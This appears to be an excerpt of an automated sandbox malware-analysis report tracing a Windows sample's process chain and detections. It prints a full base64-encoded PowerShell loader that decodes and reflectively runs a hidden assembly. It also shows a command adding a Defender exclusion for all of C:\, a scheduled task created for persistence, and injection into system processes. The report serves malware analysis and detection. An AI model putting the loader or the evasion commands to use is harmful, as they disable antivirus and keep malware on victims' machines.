Source: F324.exe String found in binary or memory: {870df8a6-6146-5dd5-addd-378b91fba06e}
Source: F324.exe String found in binary or memory: {4bae1f03-0bb4-adda-209a-54576cafa701}
Source: F324.exe String found in binary or memory: {384f6227-adde-34e6-e81f-682714c23988}
Source: F324.exe String found in binary or memory: {e0ebe2ca-8e55-2be3-2544-addea6f5d835}
Source: F324.exe String found in binary or memory: {0cfe5fb2-a3aa-add2-9c38-b846543ad633}
Source: F324.exe String found in binary or memory: {3fc95bca-0034-19c0-addc-40ff5a489a31}
Source: F324.exe String found in binary or memory: {b57dac90-5278-b5a3-addf-eb50dfea59be}
Source: F324.exe String found in binary or memory: {5b8d1595-add5-40ea-0007-33822a8d20d1}
Source: F324.exe String found in binary or memory: {21e9d188-9d35-9a3a-addc-1b641930a318}
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File read: C:\Users\user\Desktop\xwREqjHUEv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F324.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\xwREqjHUEv.exe "C:\Users\user\Desktop\xwREqjHUEv.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 720
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\gfiecjd C:\Users\user\AppData\Roaming\gfiecjd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F324.exe C:\Users\user\AppData\Local\Temp\F324.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F557.exe C:\Users\user\AppData\Local\Temp\F557.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F324.exe C:\Users\user\AppData\Local\Temp\F324.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F557.exe C:\Users\user\AppData\Local\Temp\F557.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: xwREqjHUEv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs .Net Code: sIeuMaGmXOmgxKA System.Reflection.Assembly.Load(byte[])
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs .Net Code: sIeuMaGmXOmgxKA
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.2.OpenWith.exe.24abaa39d60.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.2.OpenWith.exe.24abaa39d60.3.raw.unpack, Runtime.cs .Net Code: CoreMain
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsN